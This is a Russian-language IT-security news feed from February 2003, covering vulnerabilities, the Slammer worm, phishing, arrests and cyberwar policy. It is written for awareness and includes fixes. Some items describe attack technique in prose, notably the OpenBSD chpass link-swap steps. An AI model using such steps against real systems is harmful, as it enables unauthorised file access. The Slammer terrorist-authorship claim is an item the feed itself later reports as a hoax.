Как утверждает компания PivX, в игровом движке Unreal, применяемом во многих играх в различных ОС (Windows, Linux, MacOS), обнаружен целый букет очень опасных уязвимостей. В результате это даёт возможным проведение атак типа: локальных и удалённых DoS, распределённый DoS, атаки с подменой UDP-пакетов, создание фальшивых игроков, выполнение проивзольного кода без ограничения его размера, проблемы с обработкой URL unreal://. Geoff Shively, руководитель PivX Solutions, утверждает. что реализация механизма атаки достаточно проста и не требует очень высокого уровня квалификации. Несмотря на извещение производителя, фирмы Epic Games, никаких подвижек на устранение багов произведено не было. Об уязвимости сообщил Auriemma Luigi. Среди "пострадавших игр": Star Trek: The Next Generation: Klingon Honor Guard; Unreal; The Wheel of Time; Deus Ex; Mobile Forces; Rune; Unreal Tournament; Hired Guns; Navy Seals; TNN Outdoor Pro Hunter; Werewolf; X-Com: Alliance; Adventure Pinball; America's Army; Unreal Tournament 2003. Подробности - http://www.pivx.com/luigi/adv/ueng-adv.txt
9/02/2003 11:29 Добро пожаловать в Интернет, Кевин!
Не успел знаменитый Кевин Митник получить разрешение на работу в Интернет и воспользоваться им, как его Вэб-сайт в Интернете был задефейсен (или дефейснут - ох уж эти американизмы). :) Выполнено сие безобразие было хакером BugBear 30 января. При этом, Кевину было оставлено сообщение на дефейснутом сайте: "Дорогой Кевин, добро пожаловать в свободный мир. Чтобы ты почувствовал себя более комфортно, мы дефейснули твой Вэб-сайт www.defensivethinking.com. P.S.: твоё мастерство несколько проржавело (устарело), не правда ли?". Напомним, что Кевин основал компанию Defensive Thinking (что-то типа "Оборонительное мышление"), занимающуюся сетевой безопасностью. Зеркало дефейса - http://www.zone-h.org/defaced/2003/01/30/www.defensivethinking.com/hacked.html
9/02/2003 11:17 Слабая схема шифрования в WinZIP.
В списке рассылке BUGTRAQ cообщается о слабой схеме шифрования файлов, применяемой популярной программой WinZIP 8.0. Для шифрования файла эта программа использует библиотеку IBDL32.dll, которая не обладает достаточно стойкой схемой шифрования, ввиду неиспользования 0x269ec3 в операторе seed=0x343fD * seed; (в других архиваторах добавляется добавка, чтобы увеличить энтропию). Таким образом, автор утверждает, что, имея небольшой кусок известного текста (достаточно 36 байт), можно расшифровать файл. В письме утверждается, что на Пентиуме-500 с 128 МБ памяти это заняло меньше 2-х часов. Вывод, который делается в письме: не закрывать паролем важные критические данные при помощи программ, подобных WinZIP, А использовать для этого более криптостойкие программы шифрования. Источник - http://www.securityfocus.com
9/02/2003 10:45 Уязвимость в HP-UX.
Как утверждает некий Scotty из uk2sec, членами их команды обнаружена локальная уязвимость в утилите wall операционной системы HP-UX, выпускаемой фирмой Hewlett Packard для своих рабочих станций. Эта утилита предназначена для вывода сообщения всем пользователям рабочей станции. Было обнаружено. что при посылке очень длинного сообщения (автор использовал 9000 букв "А") происходит переполнение бучера. Для более подробного описания приводим ссылку на security.nnov.ru. Подробнее - http://www.security.nnov.ru/search/document.asp?docid=4057
9/02/2003 10:22 Хакеру поможет статистика.
Как говорится на сайте www.bugtraq.ru, Steven Bellovin из исследовательской лаборатории AT&T опубликовал базирующуюся на анализе IP-заголовков методику определения количества расположенных за NAT узлов. Подробнее - http://www.reseaux-telecoms.net/news_btree/03_02_06_133216_212/News_view
9/02/2003 09:38 Статья "Мобилизация на первую э-войну".
Сайт ZDNET опубликовал довольно любопытную статью Деклана Маккалаха, корреспондента CNET News.com в Вашингтоне, в которой автор высказывает довольно интересные суждения о создании в структуре родов войск Вооружённых Сил США боевых подразделений, предназначенных для защиты информационной инфраструктуры страны, а также для нанесения кибер-ударов по соответствующей инфрастуктуре страны вероятного противника (кто стал противником США сейчас - всем понятно, вопрос в том, кого им могут назначить в будущем политики этого государства-вампира). Приведем только некоторые цитаты из статьи: «Чтобы началась война, Саддаму достаточно напасть на США по интернету и нарушить работу какой-нибудь телекоммуникационной фирмы, — сказал мой собеседник. — Все обязательства тут же снимаются. Действие Четвертой поправки замораживается. В случае атаки на EarthLink может вмешаться армия и отключить их серверы». Так, Центр информационной войны ВМФ внес в свой устав положение «об обороне компьютерных сетей», а Высшая школа ВМФ организует для студентов учения с проникновением в сеть «красных бригад». Штаб ВВС организовал боевую лабораторию, в которой разрабатываются системы раннего предупреждения операторов о возможном начале сетевых атак и «программный агент для защиты операций», расчищающий сайты .mil для секретных документов. (Он, похоже, работает: достоверных сообщений об утечке секретных материалов через веб не слышно.) Как ни странно, информационная война значится даже в списке угроз, составленном службой преодоления чрезвычайных ситуаций штата Флорида — наряду с гражданским неповиновением, массовыми беспорядками и различными видами оружия массового поражения. Подробности - http://zdnet.ru/?ID=295463
9/02/2003 09:13 ФБР ищет хакера, обманувшего пользователей eBay.
Частная финансовая информация, содержащая данные о пользователях интернет-аукциона eBay, была похищена неизвестным хакером, использовавшим для аферы один из компьютеров университета штата Северная Каролина, сообщает Associated Press. По данным ФБР, хакер также похитил деньги как минимум у одного из участников аукциона. Глава отделения бюро в штате Северная Каролина Крис Свекер (Chris Swecker) заявил: "Я уверен, что жертв его действий на самом деле больше". По сообщению Свекера, афера была раскрыта после того, как многие пользователи eBay обратились в ФБР с заявлениями о том, что в течение последней недели они получали по электронной почте письма, отправленные якобы администрацией аукциона. В посланиях говорилось, что личные счета пользователей закрыты и не будут работать до тех пор, пока они не сообщат некоторую конфиденциальную информацию о себе. В перечень требуемых данных входили, среди прочего, номер кредитной карты и девичья фамилия матери. Ссылка на форму для введения информации, содержавшаяся в письме, вела на веб-страницу, лежащую на сервере университета Северной Каролины. По сообщению представителя университета, эта страница находилась в доступе как минимум два часа, до тех пор, пока служба, администрирующая сайт университета, не закрыла ее. По информации университета, хакер не являлся студентом или сотрудником этого учебного заведения. Источник - http://www.lenta.ru
8/02/2003 14:50 Управление пропускной способностью и приоритетом трафика.
На сайте OPENNET приведена ссылка на статью "Queuing, Traffic Shaping, and Policing", в которой описаны методы ограничения (зажимания) трафика и выделения более приоритетного трафика на сетевых интерфейсах маршрутизатора Cisco. fair-queue, priority-group, custom-queue-list, traffic-shape и rate-limit. Описаны отличия технологий - FIFO, WFQ, RED, WRED. Подробности - http://www.opennet.ru/opennews/art.shtml?num=2074
8/02/2003 13:40 В Европе создается комитет по кибербезопасности.
В рамках программы ЕС по обеспечению кибербезопасности будет создан специальный Комитет по безопасности компьютерных и инфорационных систем. Как сообщает агентство Reuters, комитет приступит к работе уже в этом году. Основаная задача комитета – создание единой информационной среды для государственных и частных структур стран Евросоюза с целью обеспечить информационную безопасность компьютерных сетей. Своевременное информирование о дырах в программном обеспечении и практические ркомендации по удалению брешей в компьютерных системам позволит избежать многих компьютерных атак и предотвратить распространение вирусов. В частности в Еврокомиссии отмечают, что именно халатное отношение к дырам в программном обеспечении позволило недавнему вирусу Helkern поразить такое число компьютерных сетей. Кроме того, с обязанности новоиспеченного комитета будет входить сертификация ПО с соблюдением всех требований безопасности. Источник - http://www.internet.ru
8/02/2003 13:06 Переполнение буфера в Windows Redirector.
На сайте www.bugtraq.ru cообщается о выпуске бюллетеня Microsoft MS03-005, констатирующего возможность переполнения буфера в Windows Redirector - модуля, абстрагирующего для клиента использование сетевых протоколов низкого уровня, использующийся также и для доступа к локальным файлам. В его реализации под XP обнаружилось переполнение буфера, делающее возможным повышение полномочий локального пользователя. Удаленное использование уязвимости невозможно, патч доступен. Бюллетень - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-005.asp
8/02/2003 12:02 В Англии арестованы международные хакеры.
В Лондоне арестованы два человека, подозреваемых в принадлежности к международной преступной группе, которая занималась порчей компьютерных сетей при помощи вирусов, сообщает Associated Press. 19-летнего инженера-электрика задержали в Дарлингтоне (Darlington), северо-востоке Англии, а 21-летнего безработного - в соседнем городе Дарем (Durham). В расследовании их деятельности и задержании участвовали сотрудники ФБР, Министерства юстиции США и Британской национальной службы безопасности высоких технологий (Britain's National Hi-Tech Crime Unit). Оба задержанных подозреваются в причастности к международной преступной хакерской группе THr34t-Krew. Их дома подверглись обыску, компьютеры были изъяты, а самих задержанных доставили для допроса в службу безопасности. Одновременно в США был проведен обыск в доме одного американского хакера в Иллинойсе. Его компьютер также был изъят. Подробнее - http://story.news.yahoo.com/news?tmpl=story&u=/ap/20030207/ap_on_hi_te/britain_hackers_2
8/02/2003 11:35 Novell рационализирует NetWare.
Компания Novell, специализирующаяся на сетевом ПО, нарисовала картину обновленной NetWare, изобразив операционную систему как альтернативу будущей Microsoft Windows Server 2003. К середине года Novell намерена выпустить ОС NetWare 6.5 с кодовым названием Nakoma, новую версию сетевого ПО, наделенную функциями, упрощающими сетевое администрирование и облегчающими доступ к сети. Кроме того, компания обещает улучшенное администрирование систем хранения данных и взаимодействие с веб-сервисами. В NetWare 6.5 появится функция «виртуального офиса», которая позволит сотрудникам предприятий входить в сеть с любого подключенного к интернету ПК, получая доступ к e-mail, сетевым файлам и другим бизнес-приложениям. Благодаря дополнительным возможностям коллективной работы можно будет создавать общие сетевые папки без помощи системного администратора. Для администраторов сетей — традиционной клиентской базы Novell — компания добавила инструменты, позволяющие управлять системами хранения данных и экономить полосу пропускания, выделяемую на связь с удаленными офисами. В NetWare 6.5 будет визуальное приложение для консолидации данных и файлов на меньшем количестве запоминающих устройств, в частности в локальных сетях хранения данных. Этот же инструмент можно использовать для установки резервных версий корпоративных данных на случай аварии. Подробности - http://zdnet.com.com/2100-1104-983443.html
8/02/2003 10:20 Microsoft выпускает средства против Slammer.
В ответ на недавнее нашествие червя Slammer Microsoft выпустила ранние версии инструментов защиты баз данных. Инструменты, выложенные на веб-сайт Microsoft, обеспечивают системного администратора средствами контроля за СУБД Microsoft SQL Server 2000 для защиты от червя Slammer и выявления уязвимостей. Они предназначены для версии СУБД, устанавливаемой на серверы, а также для SQL Server Desktop Engine, работающей на настольных ПК. В дальнейшем Microsoft планирует усовершенствовать эти утилиты. На первых порах компания предлагает три новых инструмента: 1. SQL Server 2000 SQL Scan Tool: сканирует сеть, выявляя копии SQL Server 2000 и SQL Server Desktop Engine 2000, уязвимые для червя Slammer. Утилита проверяет компьютеры с операционными системами Windows 2000, Windows NT 4.0 или Windows XP. Сам инструмент работает на Windows 2000 и более поздних версиях ОС. 2. SQL Check: сканирует отдельный компьютер, проверяя, есть ли на нем копии SQL Server 2000 или SQL Server Desktop Engine 2000, уязвимые для червя Slammer. На компьютерах под NT 4.0, Windows 2000 и Windows XP останавливает и отключает неблагонадежные сервисы. На компьютерах под Windows 98 и Windows ME просто выявляет уязвимые места. 3. SQL Critical Update: сканирует отдельные компьютеры с серверной или настольной версиями SQL Server на наличие червя Slammer и восстанавливает поврежденные файлы. Инструменты доступны - http://www.microsoft.com/sql/downloads/securitytools.asp
7/02/2003 17:06 США создает кибернетическую армию.
Президент США Джордж Буш подписал специальную директиву, которая предписывает правительству разработать доктрину кибернетической войны с вражескими компьютерными сетями, сообщает Washington Post со ссылкой на источник в администрации президента. По мнению обозревателя газеты, этот документ сопоставим по важности с доктриной о применении ядерного оружия, которая была разработана после Второй Мировой войны. Он будет включать в себя правила и условия, согласно которым США будет проникать и разрушать иностранные компьютерные сети. Как отметил представитель администрации, до сих пор США ни разу не совершала широкомасштабных кибер-атак. Однако Пентагон уже разрабатывает соответствующие военно-компьютерные технологии, при помощи которых в будущем можно будет отключать вражеские объекты дистанционно, вместо того, чтобы бомбить их. В настоящее время военные компьютерщики столкнулись с проблемой регулировки развития подобных вооружений - им необходима доктрина, в которой будут твердо установлены условия применения кибер-оружия, а также лица, которые должны будут принимать решение, кто будет его выполнять, а также какие цели могут считаться легитимными. Подробности - http://www.washingtonpost.com/wp-dyn/articles/A38110-2003Feb6.html
7/02/2003 16:32 Sun выпустила Solaris 9 для платформы x86 .
Компания Sun Microsystems объявил о выходе Solaris 9 для платформы x86, который ожидался больше года. Новая версия операционной системы, базирующейся на Unix, нацелена на корпоративных пользователей и, как считают в Sun, является конкурентом Microsoft Windows 2000 Server. Управление безопасностью и ресурсами в Solaris 9 x86 Platform Edition значительно превышают аналогичные возможности Windows, а надежность и стабильность операционной системы, по утверждению разработчиков, беспрецедентны для платформы Intel. Немаловажным аргументом является и цена: для некоммерческого использования продукт можно бесплатно загрузить с сайта Sun, а коммерческое использование обойдется в $99. Исходные коды системы также будут доступны на сайте. Гарантируется совместимость с Linux на уровне исходного и исполняемого кода. Источник - http://www.cnews.ru
7/02/2003 16:19 Перехват GSM станет доступным?
Как сообщается на сайте www.bugtraq.ru, Steve Lord, консультант X-Force Security Assessment Services for Internet Security Systems в своем интервью vnunet рассматривает различные аспекты безопасности сетей мобильноой связи стандарта GSM, начиная от возможности клонирования SIM-карт (точнее, удешевления стоимости этоого процесса) и заканчивая тезисом о крайней слабости используемого для защиты трафика алгоритма шифрования и необходимости принятия дополнительных мер защиты типа PGPPhone. Источник - http://www.vnunet.com/News/1138556
7/02/2003 15:18 Пылившийся на складе компьютер хранил важную информацию.
Не все, похоже, вняли предостережениям о необходимости тщательно удалять информацию на жестких дисках перед передачей компьютера другому владельцу или утилизацией. Выставленный на продажу компьютер из одного американского государственного учреждения содержал базу данных с конфиденциальной информацией о людях, зараженных СПИДом и венерическими заболеваниями. Компьютер был обнаружен на складе распродававшейся федеральной собственности в штате Кентукки. С такого склада имущество распределяется по другим государственным учреждениям и некоммерческим организациям. Во время ревизии проверяющие случайным образом выбрали восемь компьютеров. В одном из них, как позднее выяснилось, хранились карточки венерически больных и ВИЧ-инфицированных с указанием их сексуальных партнеров. К счастью, компьютер не успел покинуть стены склада. А ведь если бы его не направили в госучреждение или некоммерческую организацию, то приобрести такой ПК мог любой желающий. Как сообщается, этот электронный "ящик Пандоры" с 1995 по 1999 годы функционировал в агентстве, занимавшемся консультациями по вопросам ВИЧ и ЗППП. В этом компьютере найдены несколько тысяч файлов с персональными медицинскими данными. Формально считалось, что жёсткий диск компьютера был очищен от информации, когда ПК поступил на склад в конце прошлого года. Сейчас по поводу этого происшествия ведётся внутреннее расследование. Источник - http://www.ap.org/
7/02/2003 10:53 Информация о том, что вирус Slammer создали исламские террористы, оказалась "уткой".
Как и предполагали многие эксперты, история о том, что вирус Slammer, в конце января парализовавший работу интернета, был создан исламскими экстремистами, оказалась "уткой". Разместивший этот материал сайт Computerworld уже удалил статью со своих страниц. Как оказалось, журналист и бывший военный аналитик Дэн Вертон был введен в заблуждение одним из своих коллег. Террористом Абу Моджахидом оказался американский свободный журналист Брайан Макуильямс, который пишет, в частности для журналов Salon и Wired. По словам самого Макуильямса, он хотел научить репортеров скептически относиться к тем людям, которые громогласно утверждают о своей связи с кибертерроризмом. Изначально Макуильямс притворялся террористом совершенно для других целей. Он зарегистрировал и открыл сайт harkatulmujahideen.org с зеркалом в Пакистане, чтобы привлечь внимание исламских радикалов. На основе их писем журналист намеревался готовить собственные материалы. Однако внимание к сайту проявил и Дэн Вертон, которого Брайан решил проучить. О своей шутке он затем написал в одну из рассылок, откуда и стало известно о том, что журналиста Computerworld обвели вокруг пальца. Эта история вызвала ожесточенные споры среди американских журналистов, многие их которых сочли поведение Макуильямса крайней формой нарушения журналистской этики. Однако сам он не считает себя виноватым, поскольку журналист всегда должен перепроверять источники информации, а не писать сенсационные материалы со слов кого-то, кто представляется в интернете исламским террористом. Источник - http://www.compulenta.ru
7/02/2003 10:06 Мнение Symantec: активность хакеров снижается, уязвимость софта растет.
Согласно недавно опубликованной третьей части Symantec Internet Security Threat Report, во второй половине 2002 года впервые за все время наблюдалось снижение количества кибер-атак на 6% по сравнению с предыдущим полугодием - на каждую имеющую выход в Интернет компанию в среднем приходилось по 30 попыток взлома в неделю, в то время как в первом полугодии это число равнялось 32. При этом в 2002 году был зафиксирован резкий рост как количества, так и опасности атак на сетевые службы, связанные с финансовыми операциями, а также на различные компании энергетической отрасли. География местонахождения атакующих по сравнению с предыдущими годами практически не изменилась: 80% атак начинались с территории 10 стран, среди которых с большим отрывом лидируют США. Вместе с тем, отмечается значительное увеличение количества задокументированных "дыр" в существующем программном обеспечении: их число выросло на 81,5% по сравнению с 2001 годом; а время с момента обнаружения "дыры" до использования ее в целях взлома сократилось. 85% попыток взлома были лишь предварительной "разведкой" и только 15% сводились к реальным попыткам использования уязвимостей ПО. Подробности - http://enterprisesecurity.symantec.com/Content.cfm?articleID=1964
7/02/2003 09:41 На Митинском рынке задержан торговец зараженными программами.
В Москве задержан распространитель зараженных программ. 24-летний житель Красногорска в течение нескольких месяцев успешно продавал вредоносный товар на Митинском радиорынке столицы, сообщает РИА "Новости" со ссылкой на ГУВД Москвы. При загрузке купленного у него диска пользователь заражал свой компьютер, после чего в работе системы начинались сбои. Злоумышленник продавал свою продукцию по низким ценам, и только благодаря этому сумел продержаться на рынке долгое время. "Сколько человек попались на его удочку, предстоит установить следствию", - заявил представитель ГУВД. Более точных сведений о вреде, нанесенном покупателям, не сообщается. Продавца зараженных дисков задержали в в ходе оперативно-розыскных мероприятий. Против него возбуждено уголовное дело по части 1-й статьи 273 УК РФ ("создание, использование и распространение вредоносных программ для ЭВМ"), в которой предусмотрено наказание в виде лишения свободы на срок до трех лет и штраф в размере от 200 до 500 минимальных размеров оплаты труда. Источник - http://lenta.ru/
7/02/2003 09:28 Первые скриншоты Windows Server 2003.
На этой неделе в интернете появились скриншоты одного из последних билдов новой операционной системы Windows Server 2003 Build 3757. Напомним, что эта ОС должна прийти на смену серверным версиям Windows 2000. Система, первоначально называвшаяся Windows .NET Server, появится в четырех модификациях: Web Server, Standard Server, Enterprise Center и Datacenter Server. В новой серверной ОС поддерживаются технологии XML, SOAP, WSDL и UDDI. Выход новой серверной ОС неоднократно переносился. Сначала ее планировалось выпустить одновременно с Windows XP. Теперь официальная дата выхода Windows Server 2003 - апрель 2003 г. Не так давно появилась информация о том, что в новую серверную ОС будут встроены средства ограничения активности браузера, а поддержка звука будет по умолчанию отключена (см. скриншот). Из скриншотов можно заключть, что Windows Server 2003 будет поддерживать два типа интерфейса - в стиле Windows XP и классической Windows. Скриншоты - http://www.compulenta.ru/2003/2/5/37268/
6/02/2003 16:02 Ответственность за Slammer взяли на себя исламские экстремисты.
Радикальная исламская группировка "Харкат-уль-моджахеддин" взяла на себя ответственность за заражение интернета вирусом Slammer, чья эпидемия в конце января буквально парализовала работу Сети. Представители группы вступили в переписку с сайтом Computerworld, в которой заявили, что начав "киберджихад", они использовали интернет, для того чтобы посеять хаос и смятение среди неверных. В качестве доказательства своего авторства они указали на то, что в одной из первых инструкций программного кода вируса содержится число 42, которое означает сокращенное название их группы, HUM. В латинском алфавите буква H имеет порядковый номер 8, U - 21, а M - 13, что в сумме дает 42. Эксперты по интернет-безопасности, однако, скептически отзываются о таком совпадении. "Автора вируса нельзя идентифицировать его коду", - говорит Педрам Амини из калифорнийской компании iDefense. Схожий с использованным в Slammer код уже размещала на своем сайте китайская хакерская группа Honker Union of China, а примененный в вирусе алгоритм был представлен еще летом 2002 года на конференции по компьютерной безопасности Black Hat. Представитель ФБР заявил, что группировка HUM не рассматривается в качестве подозреваемых, но их деятельность и возможное отношение к происшедшему тщательно изучаются. Возможно, таким образом эта организация хочет привлечь к себе больше внимания. Организация "Харкат-уль-моджахеддин", ранее известная как "Харкаль-уль- Ансар", базируется в Пакистане, неподалеку от индийской границы .Члены HUM подозреваются в организации взрыва у здания американского посольства в Исламабаде, двух покушениях на президента страны, генерала Мушаррафа, похищении и убийстве американского журналиста и связях с Аль-Каедой. Группа имеет свой сайт - Ummah.net.pk/harkat/. Источник - http://www.securitylab.ru
6/02/2003 15:57 Вышел Blin 1.2.5.
Вышел очередной релиз легкого и быстрого LiveCD дистрибутива Linux Blin! Дистрибутив не требует инсталляции на жесткий диск и помещается на CD. На основе полученных отзывов от предыдущих версий, была улучшена процедура автоопределение аппаратных средств, в основном же изменения коснулись обновления пакетов и добавления новых. Но есть и такие, которые вполне можно отнести к значительным: добавлена поддержка USB (определяются мышь,клавиатура), добавлена возможность работы с LVM томами, понижена планка минимальных требований к машине. Запорожский сайт проекта - http://linux.zp.ua/
6/02/2003 14:56 Я не виноват, что моим кодом воспользовались, говорит исследователь.
Для создания червя SQL Slammer использовался, по всей вероятности, демонстрационный код, опубликованный экспертом по ИТ-безопасности Дэвидом Литчфилдом (David Litchfield). Однако это не заставит его прекратить обнародование эксплойтов. Исследователь утверждает, что такие примеры кода играют важную и благотворную роль для безопасности интернета и он будет продолжать их публикацию. Дэвид Литчфилд из компании NGS Software признал, что код proof of concept, написанный им для демонстрации ошибки в программном обеспечении Microsoft SQL, использовался, скорее всего, в качестве «шаблона» для червя SQL Slammer, или Sapphire, который две недели назад вывел из строя корпоративные сети, веб-сайты и даже банкоматы и компьютерные системы аэропортов. На прошлой неделе в сообщении, распространенном через список рассылки Bugtraq, Литчфилд написал, что он пересматривает практику публикации подобных кодов. «Учитывая, что кто-то взял мой код и использовал его фрагменты в неблаговидных целях, я должен поставить под сомнение целесообразность публикации демонстрационных кодов, — пишет он. — Серьезный сбой компьютеров служб спасения, таких как 911/999, может привести к гибели людей — а я не хочу чувствовать, что в этом есть и моя вина». Однако во вторник Литчфилд изменил свое мнение: он решил, что публиковать примеры кодов необходимо для сохранения безопасности сетей и компьютеров, так как секретность на самом деле не защищает. Его комментарии не понравятся некоторым членам сообщества специалистов по безопасности и антивирусам, которые расценивают публикацию демонстрационных кодов как помощь писателям вирусов. Подробнее - http://www.zdnet.ru/?ID=295633
6/02/2003 12:27 Патч к Microsoft Internet Explorer.
Как сообщает www.securiylab.ru, Microsoft выпустила совокупную заплату к IE, включающую все предыдущие исправления к IE 5.01, 5.5, 6.0 и две новых, недавно обнаруженных уязвимостей в междоменной модели безопасности. Обнаруженные недостатки позволяют одному сайту, потенциально обращаться к информации другого сайта, используя некоторые диалоговые окна. Уязвимость может использоваться через злонамеренную Web страницу. В самом плохом случае, уязвимость позволяет администратору сайта выполнить произвольный код на системе пользователя. Кроме того, уязвимость позволяет атакующему выполнять программу, расположенную на системе пользователя используя метод showHelp(). showHelp() - один из методов, который обычно используется для отображения HTML страницы, содержащей справочную информацию. showHelp() позволяет нападающему обращаться к пользовательской информации, вызывать выполняемые программы, или загружать произвольный код на систему пользователя. Этот патч отключает функционирование window.showHelp(). При установке последней версии TML Help update - которую можно загрузить совместно с этой заплатой, функция window.showHelp() будет работать снова, но с некоторыми ограничениями, блокирующими возможные векторы нападения. Подробности - http://www.SecurityLab.ru/?ID=35762
6/02/2003 11:12 Возможный баг в CheckPoint FireWall-1 NG Feature Pack 3
Как сообщает Дмитрий Леонов, ака dl, по сообщению "коллектива защитников", после установки апдейта CheckPoint FireWall-1 NG Feature Pack 3 и при включении антивирусной поддержки, файрволл прекращает пропускать файлы размером более 2 мегабайт. Единственным исключением является антивирус eSafe Gateway, который, как выяснилось, проверяет только первые 15к полученных от файрволла данных. Так что пользователь оказывается пред выбором - либо забыть про большие файлы, либо отказаться от антивирусной поддержки, либо тешить себя ложными надеждами о наличии таковой. Подробности - http://opsec.boom.ru/ru/
5/02/2003 16:04 Вышел GNOME 2.0 для ОС Solaris.
Объявлено об официальном выходе популярного десктоп-менеджера Gnome версии 2.0 для операционной системы фирмы Sun Microsystems Solaris. Также хотелось бы подчеркнуть, что в Solaris 10 решено отказаться от десктопа по умолчанию CDE в пользу Gnome. Подробности - http://wwws.sun.com/software/star/gnome/
5/02/2003 15:29 Выход SPIKE 2.8.
Ранее мы сообщали уже об тулките SPIKE, предназначенном для исследования безопасности сетевых протоколов (как существующих, так и разрабатываемых) - в терминологии авторов - full-featured network protocol analysis toolkit. Написан на Си, на условиях GPL. Dave Aitel из компании Immunity, Inc., разработавшей и поддерживающей этот иснтрумент, вчера представил широкой публике новый релиз SPIKE 2.8. От старой версии его отличает включение в продукт модуля проверки именованных каналов DCE-RPC (DCE-RPC over named pipe fuzzer). Также Immunity, Inc. представлен новый документ в рамках проекта SPIKE, описывающий технологию определения уязвимостей при помощи программ, созданных с использованием SPIKE. Это позволяет обнаружить не только недавно опубликованную уязвимости в сервисе Win RPC Locator, но также другие узявимости в Windows 2000 (подобный инструмент под названием plonk выложен на сервере в секции downloads). Название документа - "The Advantages of Block-Based Protocol Analysis for Security Testing", что можно перевести, как "Преимущества анализа блочно-ориентированных протоколов для тестирования безопасности". Подробности - http://www.immunitysec.com/spike.html
5/02/2003 13:03 Онлайновый инструмент Browser Security Test.
Алла Безручко (Alla Bezroutchko <alla@scanit.be>) представила новый онлайновый инструмент, разработанный бельгийской IT-компанией Scanit, основное назначение которого - тестирование безопасности Вэб-броузера. После прохождения этапа тестирования выдается отчёт об обнаруженных уязвимостях и рекомендации по их устранению. На данный момент проверяются 17 уязвимостей, основная масса которых сосредоточена в IE. Провериться - http://www.scanit.be/bcheck/
5/02/2003 12:29 Мутация программ как средство защиты от вирусов.
Эпидемия Slammer'а (он же Sapphire, он же Helkern) вызвала на листе BUGTRAQ весьма любопытную дискуссию, посвященная случайным модификациям кода уязвимых приложений, что, не делая их менее восприимчивыми к существующим уязвимостям, предотвращает их превращение в источник дальнейших инфекций и средство проникновения в систему. Переводы двух ключевых статей, выполненные Дмитрием Леоновым, помещены в библиотеку сайта www.bugtraq.ru. В первой из них (автор - Yinrong Huang, участвовал в написании драйверов для ОС Solaris) обсуждается идея компоновки программных модулей из перемешанных случайным образом объектных файлов на этапе установки, во второй (Дэвид Литчфилд из NGSSoftware)- смена базового адреса для программного модуля. В обоих случаях это приведет к тому, что черви, которые привязываются к фиксированным адресам в памяти, начнут бить мимо цели. Получилась любопытная модификация идеи, в гораздо более изощренном виде воплощенной в полиморфных вирусах. Только тогда вирусы таким образом прятались от антивирусных программ, сейчас же, возможно, нас ожидают "честные" программы, способные изменить свой код в целях защиты от вирусов, затем - более интеллектуальные вирусы и т.п., такая вот диалектика :) Насколько эти принципы жизнеспособны, покажет время, но идея, по крайней мере, любопытная. Первая статья - http://www.bugtraq.ru/library/programming/diversify.html Вторая статья - http://www.bugtraq.ru/library/programming/rebasing.html
5/02/2003 11:36 Множественные уязвимости в Opera 7.
Компания GreyMagic Software из Израиля сообщила об обнаружении множества уязвимостей в популярном и компактном (а также довольно быстром) броузере Opera, выпускаемом норвежской фирмой Opera Software. Уязвимости были обнаружены в крайней версии 7.0, недавно выпущенной фирмой. Уязвимыми оказались: модель безопасности броузера, консоль Javascript, способ отображения рисунков, метод работы с файлом истории, обработка журнала ошибок. Всё вышеперечисленное делает возможным: межсайтовый скриптинг (в т.ч. в локальной зоне), доступ к локальным файлам, доступ к почте, получение сведений о действиях пользователя. Подробное описание уязвимостей довольно затруднительно ввиду большого объёма информации, поэтому в приведённой ниже ссылке стоит посмотреть описания: GM#002-OP, GM#003-OP, GM#004-OP, GM#005-OP, GM#006-OP. Необходимо отметить, что Opera Software в течении 24 часов после опубликования уязвимости выпустила новую версию броузера для платформы Windows - Opera 7.01, о чём и известила пользователей на своём сайте. Объём - 12.9Mb (с пакетом Java) и 3.3 Mb - без Java. Подробности - http://security.greymagic.com/adv/
5/02/2003 11:05 Конференция SummerCon 2003.
Mark F. Trumpbour сообщает о проведении 6-8 июня 2003 г. очередной ежегодной конференции SummerCon 2003. Место проведения: США, г.Питтсбург, клуб Питтсбургского университета. Объявлено о начале приёма выступлений, для чего необходимо связаться с организаторами конференции и сообщить тему выступления и его краткие тезисы. Стоимость участия довольно невелика (по меркам американцев) - предварительная регистрация $30, вход -$40. Подробности - http://www.summercon.org
5/02/2003 10:33 Уязвимость в OpenBSD.
Marc Bevand из Франции опубликовал сообщение об обнаружении локальной уязвимости в утилите chpass ОС OpenBSD. Эта setuid-root утилита используется для редактирования информации базы данных о пользователе. Утилиты chfn и chsh, также применяемые для этих задач, являются просто жёсткими ссылками на chpass. Уязвимость позволяет локальному пользователю просматривать любой файл сервера. Для осуществления этоу операции необходимо во строенном редакторе chpass нажать Ctrl+Z (переход в фоновый режим), изменить ссылку на временный файл, созданный chpass на необходимый закрытый файл и вернуть редактор из фонового режима в фореграунд (команда fg). Команда разработчиков выпустила в CVS-репозитарии новую версию chpass, также сам автор выпустил diff-файл для изменения исходного кода утилиты. Подробности - http://www.epita.fr/~bevand_m/asa/asa-0001
5/02/2003 09:29 Уязвимость в vim.
Обнаружилось тут описание уязвимости в тексстовом редакторе vim, присутствующем во многих *NIX - ОС, а также существующего в виде клона для Win-платформ. Обнаружена известным исследователем компьютерной безопасности Георгием Гунинским (Georgi Guninski) 12 декабря 2002 г. Поскольку в то время эта уязвимость как-то прошла мимо наших новостей, хотелось бы на ней остановиться. Заключается она в так называемом режиме строки (modelines). Сформировав текстовый файл с установленным modelines, злоумышленник получает возможность выполнения произвольных команд оболочки (шелла) с передачей параметров. Некоторые сценарии уязвимости могут включать MUA (mail user agent), которые используются vim как редактором (в частности, mutt), а также доступ к лог-файлам сервера. Для предотвращения рекомендуется в файл ~/.vimrc (либо в общий конфигурационный файл) включить линию: set modelines=0. Обнаружено было в vim6.0/6.1. Необходимо также отметить, что основная масса производителей открытых ОС выпустила обновлённые версии редактора. Подробности - http://www.guninski.com/vim1.html
5/02/2003 09:25 Семинар "Введение в управление проектами на основе Microsoft Project 2002".
11 февраля 2003г. компания SoftLine приглашает принять участие в бесплатном семинаре "Введение в управление проектами на основе Microsoft Project 2002". На данном семинаре будут рассмотрены вопросы управления проектами с использованием семейства продуктов Microsoft Project. Будет представлены возможности русской версии Microsoft Project 2002, особое внимание будет уделено возможностям Microsoft Project 2002 по созданию, управлению и отслеживанию выполнения проектов. Также на семинаре будут представлены схемы лицензирования продуктов Microsoft. Как и всегда, семинар состоится по адресу: г.Москва, ул. Губкина, д. 8 Математический институт им. Стеклова. Начало семинара - в 9.30. Для участие необходимо обязательно зарегистрироваться на сайте Softline. Регистрация - http://www.softline.ru/seminar.asp?...
4/02/2003 12:00 Хакеры взломали серверы NASA.
